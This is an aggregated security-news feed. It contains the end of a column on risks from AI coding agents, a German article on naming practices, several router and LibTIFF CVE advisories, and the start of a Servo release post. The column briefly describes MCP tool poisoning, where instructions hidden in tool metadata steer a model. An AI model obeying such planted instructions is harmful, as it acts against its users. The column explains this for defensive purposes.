<p>Consider that in a <a href="https://arxiv.org/abs/2601.00205">study of 117,062 dependency changes across seven ecosystems</a>, researchers at Purdue found that AI agents selected known-vulnerable package versions more often than humans, 2.46% of the time versus 1.64%. The agents’ bad picks were also harder to undo: 36.8% required a major-version upgrade to remediate, against 12.9% for humans. At the aggregate level, agent-driven dependency work produced a net increase of 98 vulnerabilities while human-authored work produced a net reduction of 1,316. Agents also invent dependencies that don’t exist, which become an attack surface the moment someone registers the hallucinated name, as my <a href="https://www.infoworld.com/article/4167479/supply-chain-attacks-take-aim-at-your-ai-coding-agents-2.html">InfoWorld colleague Lucian Constantin has covered</a>.</p>



<p>Don’t take this as proof that humans always win. After all, developers have been making a mess of dependency graphs well before chatbots learned to obsequiously apologize. But letting agents “helpfully” add and update dependencies without guardrails is asking for a familiar problem at lightning-fast speed.</p>



<p>The MCP layer is its own version of the same trap. <a href="https://developer.microsoft.com/blog/protecting-against-indirect-injection-attacks-mcp">Microsoft has documented tool poisoning</a>, in which malicious instructions hide inside the tool metadata a model reads to decide what to call. In its own red-team work, Microsoft <a href="https://developer.microsoft.com/blog/securing-mcp-a-control-plane-for-agent-tool-execution">found that relying on the model to follow safety instructions</a> produced policy violations more than 25% of the time and concluded that instruction-following alone shouldn’t be treated as a security boundary. <a href="https://owasp.org/www-community/attacks/MCP_Tool_Poisoning">OWASP said it more plainly</a>: A tool response goes straight into the model’s context with no equivalent of the review a tool description gets at connect time, and a prompt restriction like “don’t read files outside <code>/tmp</code>” is enforced by the model’s goodwill, not by access control.</p>



<p>That’s bad. Are prompts even worse?</p>



<p>Sean Goedecke recently <a href="https://www.seangoedecke.com/prompts-are-technical-debt-too/">argued that prompts also introduce technical debt</a> and decay silently. A prompt that worked against one model behaves differently against the next. Pile enough of them together—the <code>AGENTS.md</code> and <code>CLAUDE.md</code> files, the skills, the rules, the tool descriptions—and you’ve quietly built an alternate control plane for how your software gets written. Most teams never test it, review it, or prune it, leaving your agents to make worse decisions while sounding perfectly reasonable.</p>



<h2 class="wp-block-heading">‘Latest’ is not the same as safe</h2>



<p>The extreme version of Hashimoto’s rules won’t fix this, and frankly, they won’t work for most teams. Most enterprises don’t have the staff, the patience, or the judgment for it. But strip away that extreme version and the discipline underneath is exactly right: Every dependency should have a reason to exist, and every update should have a reason to land.</p>



<p>This cuts against the grain of modern development, where adding a package feels cheaper than thinking. It cuts even harder against how agents work. Agents are very good at finding a library, importing it, and moving on. They optimize for the fastest path to a passing test, not for the long-term health of your dependency graph. This is the same gap <a href="https://www.infoworld.com/article/4166247/making-ai-work-through-eval-hygiene.html">I keep coming back to with evals</a>: AI doesn’t eliminate engineering discipline; it raises the price of skipping it. The model can make the change faster. It can’t reliably tell you whether the change belongs in your system. <a href="https://www.infoworld.com/article/4176534/ai-coding-agents-need-good-software-engineers.html">That judgment is still yours</a>.</p>



<h2 class="wp-block-heading">Latent bugs won’t stay latent</h2>



<p>Still, there’s a problem with Hashimoto’s approach, even the non-extreme version. Hashimoto’s bet assumes the undiscovered flaw in your frozen dependency stays undiscovered. For most of software history that was a safe assumption, because finding a deep logic bug in mature code was slow, expensive, human work. With AI that assumption no longer holds true.</p>



<p>In April, Anthropic’s <a href="https://www.helpnetsecurity.com/2026/04/08/anthropic-claude-mythos-preview-identify-vulnerabilities/">Claude Mythos Preview</a> autonomously found and built working exploits for a 16-year-old bug in FFmpeg and a 17-year-old root-access flaw in FreeBSD’s NFS server for under $20,000 across about a thousand runs. A month later, Google’s threat researchers <a href="https://cybersecuritynews.com/ai-zero-day-exploit/">flagged the first AI-developed zero-day</a> seen in the wild, a semantic logic flaw of exactly the sort traditional scanners miss.</p>



<p>These old dependencies felt safe, but now a hacker can inexpensively rent the discovery of chinks in the armor.</p>



<p>This doesn’t refute Hashimoto, but it does require a refinement of his rules. Trimming a dependency to just your use case yields better control, because every function you didn’t import can’t be turned into a zero-day against you. Forking lets you patch on your own time instead of waiting on an upstream maintainer. Importantly, the same models scoring your code for the attackers can (and must) score it for you first.</p>



<p>The rule was never really not to update. It’s instead to know your surface, keep it small, and keep scoring it, because now everyone else is.</p>



<h2 class="wp-block-heading"><a></a>Fewer things, better understood</h2>



<p>Yes, this changes the game. The best AI engineering teams won’t be the ones that wire agents into everything, sexy though that sounds. No, smart engineers will know precisely what they’ve wired in, why it’s there, and what happens when it changes.</p>



<p>That doesn’t mean banning MCP servers, agent tools, or third-party packages. That would be dumb. Rather it means treating all of them as production dependencies, because that’s what they are. If an MCP server can read email, query customer data, or execute code, it deserves the <a href="https://www.infoworld.com/article/4110056/building-ai-agents-the-safe-way.html">scrutiny of any other privileged integration</a>. If a prompt file shapes how an agent edits your codebase, it belongs in version control, gets reviewed, and gets deleted when it stops being useful. This is where Goedecke’s advice and the governance instinct meet: Goedecke would keep that configuration layer as thin as he could, on the logic that the cheapest debt is the prompt you never wrote. The governance crowd would version, review, and gate whatever survives.</p>



<p>This isn’t really new. The history of this industry is littered with technologies that looked liberating until they became operational burdens, and the way to deal with them is usually the same. <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">Microservices</a> were going to free us from the monolith until many teams discovered they’d traded one big problem for 200 small ones connected by unreliable networks. <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a> was going to standardize infrastructure until companies realized they’d <a href="https://www.infoworld.com/article/4171983/the-new-ai-lock-in.html">imported a distributed-systems project into every team</a>.</p>



<p>Agents are following the same pattern, only faster. They make work easier by adding layers of delegation. Those layers become dependencies, and those dependencies become risk. That’s not an argument to stop, but it <em>is</em> an argument to be more thoughtful.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[9 Naming-Praktiken zum Abgewöhnen]]></title>
<description><![CDATA[Geht’s um Naming, sollten Sie als Dev am besten so agieren, als würde Ihr Code von einem Psychopathen gewartet – der ganz genau weiß, wo Sie wohnen.Master1305 | shutterstock.com



Ein betagter, aber immer noch beliebter Witz in Programmiererkreisen:



Es gibt zwei schwierige Dinge bei der Progr...]]></description>
<link>https://tsecurity.de/de/3561792/it-security-nachrichten/9-naming-praktiken-zum-abgewoehnen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561792/it-security-nachrichten/9-naming-praktiken-zum-abgewoehnen/</guid>
<pubDate>Mon, 01 Jun 2026 06:07:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/Master1305_shutterstock_1060484813_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Psycho Maintainer 16z9" class="wp-image-4006034" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Geht’s um Naming, sollten Sie als Dev am besten so agieren, als würde Ihr Code von einem Psychopathen gewartet – der ganz genau weiß, wo Sie wohnen.</figcaption></figure><p class="imageCredit">Master1305 | shutterstock.com</p></div>



<p>Ein betagter, aber immer noch beliebter Witz in <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" target="_blank">Programmiererkreisen</a>:</p>



<p><code>Es gibt zwei schwierige Dinge bei der Programmierarbeit: Cache Invalidation, Naming und Off-by-One-Fehler.</code></p>



<p>Während Erstgenanntes tatsächlich komplex ist und Letztgenanntes die Pointe darstellt, wirft die Einordnung von Naming Fragen auf. Denn Dinge in der <a href="https://www.computerwoche.de/article/3963767/die-grosten-paradoxa-der-softwareentwicklung.html" target="_blank">Softwareentwicklung</a> zu benennen, ist eigentlich simpel. Zumindest sollte es das sein. Leider legen jedoch nicht wenige Developer aus Gründen eine gewisse Aversion an den Tag, wenn es um Naming geht – und machen sich (und anderen) damit das Leben unnötig schwer. Schließlich können sinnvolle Benennungen nicht nur die kognitive Belastung bei der Codepflege erheblich reduzieren. Sie tragen auch dazu bei, <a href="https://www.computerwoche.de/article/3488079/8-tipps-um-wie-ein-senior-developer-zu-coden.html" target="_blank">Fehler zu vermeiden und Bugs zu verhindern</a>.  </p>



<p>In diesem Artikel beleuchten wir neun ausgesprochen schlechte Naming-Angewohnheiten, die Entwickler dringend abstellen sollten. Und geben einige Tipps, wie es besser geht.  </p>



<h2 class="wp-block-heading">1. Wissen voraussetzen</h2>



<p>Wissen vorauszusetzen, ist in vielen Fällen der erste Schritt in den Naming-Untergang. Sie wissen vielleicht mit Sicherheit, dass <code>EmpNo</code> für „Employee Number“ steht und es sich um die unique ID in der <a href="https://www.computerwoche.de/article/3497295/datenbank-how-to-fur-app-entwickler.html" target="_blank">Datenbank</a> handelt. Ein neuer Dev hält es hingegen für etwas anderes, das nichts mit den Werten in der DB zu tun hat.</p>



<p>Wieso also nicht einfach die Dinge eindeutig beim Namen nennen? Zum Beispiel in Form von <code>EmployeeUniqueIDInDatabase</code>. Das ist zugegeben etwas lang, dafür sind folgenreiche Verwechslungen aber dank des klaren, deskriptiven Namings ausgeschlossen. Das Argument “zu viel Tipparbeit” greift auch an dieser Stelle nicht. Erstens ist Faulheit keine Option. Zweitens übernimmt heutzutage die <a href="https://www.computerwoche.de/article/3488115/visual-studio-code-alternative-im-test.html" target="_blank">IDE</a> das Gros der Tastaturarbeit.  </p>



<h2 class="wp-block-heading">2. Präzision vernachlässigen</h2>



<p>Manchmal ist die Semantik einer Benennung nicht präzise genug – was im Laufe der Zeit zu “inhaltlichen Verschiebungen” führen kann. Sie könnten etwa die Methode <code>SaveReceipt</code> implementieren, um eine Kopie von Belegen in der Datenbank abzulegen. Nachträglich erweitern Sie die Routine dann vielleicht um Printing und verlagern den eigentlichen Speichervorgang in eine andere Methode. Und schon führt das gewählte Naming auf den Holzweg.  </p>



<p>Die Wahrscheinlichkeit, dass es dazu kommt, sinkt dramatisch, wenn Sie von Anfang an auf eine eindeutige Benennung im Stil von <code>SaveReceiptToTheDatabase</code> setzen.</p>



<h2 class="wp-block-heading">3. Faulenzerei vorziehen</h2>



<p>Naming ist zwar nicht diffizil, verlangt aber ein bisschen Denkarbeit – die Zeit kostet. Weil viele Devs sich diese nicht nehmen wollen (oder <a href="https://www.computerwoche.de/article/3600678/entwickler-gehoren-nicht-ans-fliesband.html" target="_blank">können</a>), kommt es immer wieder zu Dummheiten wie Variablennamen, die aus einem einzelnen Buchstaben bestehen (einzige Ausnahme: <code>i</code> als Variable in einem Loop, aber selbst dann wäre <code>Index</code> die deutlich bessere Wahl). Stattdessen sollten Sie einer Variablen einen wirklich aussagekräftigen Namen zugestehen. Es mag etwas Zeit und Mühe kosten, lohnt sich aber. </p>



<p>Sparen Sie sich zum Beispiel so etwas:  </p>



<pre class="wp-block-preformatted">If (EmployeeNumber &gt; 0) and (OrderNumber &gt;  0) {
 // ...
}</pre>



<p>Und gehen Sie stattdessen die Extrameile:</p>



<pre class="wp-block-preformatted">EmployeeIsValid = EmployeeUniqueIDInDatabase &gt; 0;
ThereIsAnOrder = OrderNumber &gt; 0;
ItIsOkayToProcessTheOrder := EmployeeIsValid and ThereIsAnOrder;
If ItIsOkayToProcessTheOrder {
  // ...
}
</pre>



<p>Das ist um Welten besser lesbar – und den Variablennamen ist klar zu entnehmen, wofür sie stehen.</p>



<h2 class="wp-block-heading">4. Abkürzungen verfallen</h2>



<p>Faulheit ist zwar keine Option, Hektik aber ebenso wenig. Denn die führt im Regelfall nur dazu, dass eindeutiges Naming unklaren und vor allem unnötigen Abkürzungen weichen muss. Die 0,876 Sekunden, die Sie mit <code>acctBlnc</code> im Vergleich zu <code>accountBalance</code> sparen, sind wertlos, wenn es dadurch zig Stunden länger dauert, den Code zu warten. Und davon abgesehen: Um welche Account Balance geht es überhaupt? Die des Unternehmens? Die des Kunden?  </p>



<p>Auch an dieser Stelle hilft nur: Austippen. Kürzen Sie am besten einfach gar nichts ab (von Standards wie URL und http einmal abgesehen). Das kann auch dazu beitragen, die unbegründete “Angst” vor erklärendem, klaren Naming abzustreifen.</p>



<h2 class="wp-block-heading">5. Funktionen schwammig benennen</h2>



<p>Methoden sollten mit Verben benannt werden und vollständig beschreiben, was sie tun. So ist <code>getCustomer</code> ein guter Anfang – lässt aber Fragen offen: Woher wird der Kunde geholt? Und was genau wird dabei geholt?</p>



<p>Die bessere Option: <code>getCustomerInstanceFromDatabase</code>.</p>



<h2 class="wp-block-heading">6. Konsistenz über Bord werfen</h2>



<p>Wenn Sie <code>Customer</code> verwenden, um einen Kunden zu bezeichnen, der etwas am Point-of-Sale-System kauft, sollten Sie auch sicherstellen, dass dieses Naming überall zum Zuge kommt. Den Kunden in anderen Modulen als <code>Client</code> oder <code>Buyer</code> zu bezeichnen, führt ins Unglück.</p>



<p>Nutzen Sie dieselben Begrifflichkeiten konsistent in Ihrem gesamten Repository.</p>



<h2 class="wp-block-heading">7. Ins Negativ abdriften</h2>



<p>Insbesondere, wenn es um <a href="https://www.computerwoche.de/article/3993887/5-boolean-tipps-fur-entwickler.html" target="_blank">Booleans</a> geht, sollten Sie auf ein positives Naming setzen, statt auf Grausamkeiten wie <code>isNotValid</code> oder <code>denyAccess</code>:</p>



<pre class="wp-block-preformatted">if (!IsNotValid) or (!denyAccess) {
  // ...
} 
</pre>



<p>Vermeiden Sie doppelte Verneinungen in Ihrem Code unter allen Umständen.</p>



<h2 class="wp-block-heading">8. Präfixe einsetzen</h2>



<p>In früheren Zeiten war die <a href="https://de.wikipedia.org/wiki/Ungarische_Notation" target="_blank" rel="noreferrer noopener">ungarische Notation</a> sehr beliebt: Dabei wurden sämtliche Namen mit einem Präfix versehen, das definierte, um was es sich genau handelt. Das ist allerdings inzwischen aus der Mode gekommen, weil es zu komplex wurde. Ich für meinen Teil bevorzuge Namen, die aussagekräftig genug sind, um dem Maintainer zu vermitteln, was Sache ist. Beispielsweise handelt es sich bei <code>EmployeeCount</code> offensichtlich um eine Ganzzahl, bei <code>FirstName</code> um einen String.</p>



<p>Manche Devs nutzen auch ein Buchstaben-Präfix für ihre Variablennamen, um deren Rolle in einer Methode anzugeben – etwa <code>l</code> für lokale Variablen und <code>a</code> für Methodenargumente oder Parameter. Ich bin davon nicht überzeugt. Im Gegenteil: Wenn Ihre Methoden so ausufern, dass nicht auf den ersten Blick ersichtlich ist, welche Rolle eine Variable spielt, ist <a href="https://www.computerwoche.de/article/3990309/die-drei-refactorings-die-jeder-entwickler-am-meisten-braucht.html" target="_blank">Refactoring</a> angebracht.</p>



<h2 class="wp-block-heading">9. Kauderwelsch nutzen</h2>



<p>Zu vermeiden sind in Sachen Naming außerdem auch Wörter, die keine wirkliche Bedeutung aufweisen.</p>



<p>Sehen Sie von “Naming-Junkfood” ab wie:</p>



<ul class="wp-block-list">
<li><code>Helper</code>,</li>



<li><code>Handler</code>,</li>



<li><code>Service</code>,</li>



<li><code>Util</code>,</li>



<li><code>Process</code>,</li>



<li><code>Info</code>,</li>



<li><code>Data</code>,</li>



<li><code>Task</code>,</li>



<li><code>Object</code> oder</li>



<li><code>Stuff</code>.</li>
</ul>



<p>(fm)</p>



<p><strong>Sie wollen weitere interessante Beiträge zu diversen Themen aus der IT-Welt lesen? </strong><a href="https://www.computerwoche.de/newsletter-anmeldung/" target="_blank"><strong>Unsere kostenlosen Newsletter</strong></a><strong> liefern Ihnen alles, was IT-Profis wissen sollten – direkt in Ihre Inbox!</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10182 | TRENDnet TEW-432BRP 3.10B20 /goform/formWlanSetup enrollee command injection (EUVD-2026-33504)]]></title>
<description><![CDATA[A vulnerability was found in TRENDnet TEW-432BRP 3.10B20 and classified as critical. The impacted element is the function formWlanSetup of the file /goform/formWlanSetup. Executing a manipulation of the argument enrollee can lead to command injection. This vulnerability only affects products that...]]></description>
<link>https://tsecurity.de/de/3561035/sicherheitsluecken/cve-2026-10182-trendnet-tew-432brp-310b20-goformformwlansetup-enrollee-command-injection-euvd-2026-33504/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561035/sicherheitsluecken/cve-2026-10182-trendnet-tew-432brp-310b20-goformformwlansetup-enrollee-command-injection-euvd-2026-33504/</guid>
<pubDate>Sun, 31 May 2026 17:38:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is the function <code>formWlanSetup</code> of the file <em>/goform/formWlanSetup</em>. Executing a manipulation of the argument <em>enrollee</em> can lead to command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-10182">CVE-2026-10182</a>. The attack can be launched remotely. Moreover, an exploit is present.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10183 | TRENDnet TEW-432BRP 3.10B20 /goform/formWlanSetup enrollee stack-based overflow (EUVD-2026-33505)]]></title>
<description><![CDATA[A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. It has been classified as critical. This affects the function formWlanSetup of the file /goform/formWlanSetup. The manipulation of the argument enrollee leads to stack-based buffer overflow. This vulnerability only affects products that ar...]]></description>
<link>https://tsecurity.de/de/3561034/sicherheitsluecken/cve-2026-10183-trendnet-tew-432brp-310b20-goformformwlansetup-enrollee-stack-based-overflow-euvd-2026-33505/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561034/sicherheitsluecken/cve-2026-10183-trendnet-tew-432brp-310b20-goformformwlansetup-enrollee-stack-based-overflow-euvd-2026-33505/</guid>
<pubDate>Sun, 31 May 2026 17:38:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects the function <code>formWlanSetup</code> of the file <em>/goform/formWlanSetup</em>. The manipulation of the argument <em>enrollee</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-10183">CVE-2026-10183</a>. The attack may be initiated remotely. In addition, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10181 | TRENDnet TEW-432BRP 3.10B20 /goform/formSysCmd submit-url stack-based overflow (EUVD-2026-33503)]]></title>
<description><![CDATA[A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20 and classified as critical. The affected element is the function formSysCmd of the file /goform/formSysCmd. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. This vulnerability only affects pr...]]></description>
<link>https://tsecurity.de/de/3561031/sicherheitsluecken/cve-2026-10181-trendnet-tew-432brp-310b20-goformformsyscmd-submit-url-stack-based-overflow-euvd-2026-33503/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561031/sicherheitsluecken/cve-2026-10181-trendnet-tew-432brp-310b20-goformformsyscmd-submit-url-stack-based-overflow-euvd-2026-33503/</guid>
<pubDate>Sun, 31 May 2026 17:37:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is the function <code>formSysCmd</code> of the file <em>/goform/formSysCmd</em>. Performing a manipulation of the argument <em>submit-url</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-10181">CVE-2026-10181</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10180 | TRENDnet TEW-432BRP 3.10B20 /goform/formSysCmd sysCmd command injection (EUVD-2026-33500)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in TRENDnet TEW-432BRP 3.10B20. Impacted is the function formSysCmd of the file /goform/formSysCmd. Such manipulation of the argument sysCmd leads to command injection. This vulnerability only affects products that are no longer support...]]></description>
<link>https://tsecurity.de/de/3560913/sicherheitsluecken/cve-2026-10180-trendnet-tew-432brp-310b20-goformformsyscmd-syscmd-command-injection-euvd-2026-33500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560913/sicherheitsluecken/cve-2026-10180-trendnet-tew-432brp-310b20-goformformsyscmd-syscmd-command-injection-euvd-2026-33500/</guid>
<pubDate>Sun, 31 May 2026 16:09:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Impacted is the function <code>formSysCmd</code> of the file <em>/goform/formSysCmd</em>. Such manipulation of the argument <em>sysCmd</em> leads to command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-10180">CVE-2026-10180</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10179 | TRENDnet TEW-432BRP 3.10B20 formSetWlanEncrypt webpage stack-based overflow (EUVD-2026-33499)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in TRENDnet TEW-432BRP 3.10B20. This issue affects the function formSetWlanEncrypt of the file /goform/formSetWlanEncrypt. This manipulation of the argument webpage causes stack-based buffer overflow. This vulnerability only affect...]]></description>
<link>https://tsecurity.de/de/3560909/sicherheitsluecken/cve-2026-10179-trendnet-tew-432brp-310b20-formsetwlanencrypt-webpage-stack-based-overflow-euvd-2026-33499/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560909/sicherheitsluecken/cve-2026-10179-trendnet-tew-432brp-310b20-formsetwlanencrypt-webpage-stack-based-overflow-euvd-2026-33499/</guid>
<pubDate>Sun, 31 May 2026 16:08:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This issue affects the function <code>formSetWlanEncrypt</code> of the file <em>/goform/formSetWlanEncrypt</em>. This manipulation of the argument <em>webpage</em> causes stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-10179">CVE-2026-10179</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-9165 | LibTIFF 4.7.0 tiffcmp tools/tiffcmp.c memory leak (728/729 / Nessus ID 254437)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in LibTIFF 4.7.0. This affects the function _TIFFmallocExt/_TIFFCheckRealloc/TIFFHashSetNew/InitCCITTFax3 of the file tools/tiffcmp.c of the component tiffcmp. Executing a manipulation can lead to memory leak.

This vulnerability is tra...]]></description>
<link>https://tsecurity.de/de/3560747/sicherheitsluecken/cve-2025-9165-libtiff-470-tiffcmp-toolstiffcmpc-memory-leak-728729-nessus-id-254437/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560747/sicherheitsluecken/cve-2025-9165-libtiff-470-tiffcmp-toolstiffcmpc-memory-leak-728729-nessus-id-254437/</guid>
<pubDate>Sun, 31 May 2026 14:09:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/libtiff">LibTIFF 4.7.0</a>. This affects the function <code>_TIFFmallocExt/_TIFFCheckRealloc/TIFFHashSetNew/InitCCITTFax3</code> of the file <em>tools/tiffcmp.c</em> of the component <em>tiffcmp</em>. Executing a manipulation can lead to memory leak.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2025-9165">CVE-2025-9165</a>. The attack is restricted to local execution. Moreover, an exploit is present.

There is ongoing doubt regarding the real existence of this vulnerability.

It is best practice to apply a patch to resolve this issue.

A researcher disputes the security impact of this issue, because "this is a memory leak on a command line tool that is about to exit anyway". In the reply the project maintainer declares this issue as "a simple 'bug' when leaving the command line tool and (...) not a security issue at all".]]></content:encoded>
</item>
<item>
<title><![CDATA[The Servo Blog: April in Servo: new Android UI, focus, forms, security fixes, and more!]]></title>
<description><![CDATA[Servo 0.2.0 contains all of the changes we landed in April, which came out to yet another record 534 commits (March: 530).
For security fixes, see § Security.

Note: the GitHub release is available now, but the crates.io release is not yet complete.
We expect to publish it some time next week.


...]]></description>
<link>https://tsecurity.de/de/3560659/tools/the-servo-blog-april-in-servo-new-android-ui-focus-forms-security-fixes-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560659/tools/the-servo-blog-april-in-servo-new-android-ui-focus-forms-security-fixes-and-more/</guid>
<pubDate>Sun, 31 May 2026 13:08:28 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/servo/servo/releases/tag/v0.2.0"><strong>Servo 0.2.0</strong></a> contains all of the changes we landed in April, which came out to yet another record <strong>534 commits</strong> (March: 530).
For security fixes, see <a href="https://servo.org/blog/2026/05/31/april-in-servo/#security"><strong>§ Security</strong></a>.</p>
<aside class="_note">
<p><strong>Note:</strong> the GitHub release is available now, but <a href="https://crates.io/crates/servo">the crates.io release</a> is not yet complete.
We expect to publish it some time <strong>next week</strong>.</p>
</aside>
<figure>
    <a href="https://servo.org/img/blog/2026-05-diffie.png"><img alt="servoshell 0.2.0 showing several new features: better wrapping for CJK scripts, ‘tab-size’, better file pickers and `&lt;textarea&gt;`, `&lt;select multiple&gt;`, ‘::details-content::before’ and ‘::details-content::after’, and ‘color-mix()’ with any number of colors" src="https://servo.org/img/blog/2026-05-diffie.png"></a>
</figure>
<p>We’ve shipped several new web platform features:</p>
<ul>
<li><strong>&lt;select multiple&gt;</strong> (<a href="https://github.com/lukewarlow">@lukewarlow</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43189">#43189</a>)</li>
<li><strong>&lt;template shadowrootslotassignment&gt;</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44246">#44246</a>)</li>
<li><strong>&lt;video&gt;</strong> playback on OpenHarmony (<a href="https://github.com/rayguo17">@rayguo17</a>, <a href="https://github.com/servo/servo/pull/43208">#43208</a>)</li>
<li><strong>‘minimum-scale’</strong> and <strong>‘maximum-scale’</strong> values in <strong>&lt;meta name=viewport&gt;</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/40098">#40098</a>, <a href="https://github.com/servo/servo/pull/43715">#43715</a>)</li>
<li><strong>‘color-mix()’</strong> with <strong>any number of &lt;color&gt; values</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43890">#43890</a>)</li>
<li><strong>‘&amp;::before’</strong> and <strong>‘&amp;::after’</strong> in <strong>‘::details-content’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>)</li>
<li><strong>‘revert-rule’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>)</li>
<li><strong>‘tab-size’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44480">#44480</a>)</li>
<li><strong>‘text-align: match-parent’</strong> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/44073">#44073</a>)</li>
<li><strong>new Worker()</strong> with <strong>blob URLs</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44004">#44004</a>)</li>
